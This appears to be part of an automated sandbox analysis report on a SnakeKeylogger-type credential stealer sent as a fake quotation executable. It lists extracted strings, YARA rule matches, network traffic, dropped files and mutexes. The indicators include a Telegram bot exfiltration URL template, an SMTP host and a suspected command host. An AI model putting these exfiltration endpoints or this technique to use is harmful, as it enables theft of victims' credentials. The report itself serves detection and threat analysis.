                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1632148313.0000000002701000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1660117333.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, vTAuFgZcVE.exe.0.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                  Source: vbc.exe, 00000007.00000002.4059070573.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.000000000708E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20a
                  Source: vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: vbc.exe, 0000000C.00000002.4058029996.00000000070D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enP
                  Source: vbc.exe, 00000007.00000002.4059070573.000000000752D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.00000000070CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: vbc.exe, 00000007.00000002.4059070573.00000000073BF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.000000000742F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F5F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FCE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.00000000073BF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: vbc.exe, 00000007.00000002.4059070573.000000000742F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.00000000073E9000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FCE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F89000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: vbc.exe, 0000000C.00000002.4058029996.00000000070F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007554000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/P
                  Source: vbc.exe, 00000007.00000002.4059070573.000000000755E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.00000000070FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49751 version: TLS 1.2

                  System Summary

                  Source: 12.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                  Source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: Process Memory Space: QUOTATION REQUIRED_Enatel s.r.l..bat.exe PID: 5748, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: Process Memory Space: vTAuFgZcVE.exe PID: 6752, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: initial sample, Static PE information: Filename: QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Process Stats: CPU usage > 49%
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1632148313.0000000002701000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameRemington.exe4 vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1637163266.00000000091F0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameMontero.dll8 vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1627609901.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameRemington.exe4 vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMontero.dll8 vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000000.1584433737.00000000003DA000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameSnHY.exe0 vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMontero.dll8 vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1636286336.0000000006976000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1636139946.00000000068C0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameCaptive.dll" vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1632148313.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCaptive.dll" vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, Binary or memory string: OriginalFilenameSnHY.exe0 vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 12.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1, date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1, date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1, date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1, date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1, date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1, date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: QUOTATION REQUIRED_Enatel s.r.l..bat.exe PID: 5748, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: vTAuFgZcVE.exe PID: 6752, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: vTAuFgZcVE.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/11@6/5
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeFile created: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMutant created: \Sessions\1\BaseNamedObjects\iUpstagROQblp
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4128:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_03
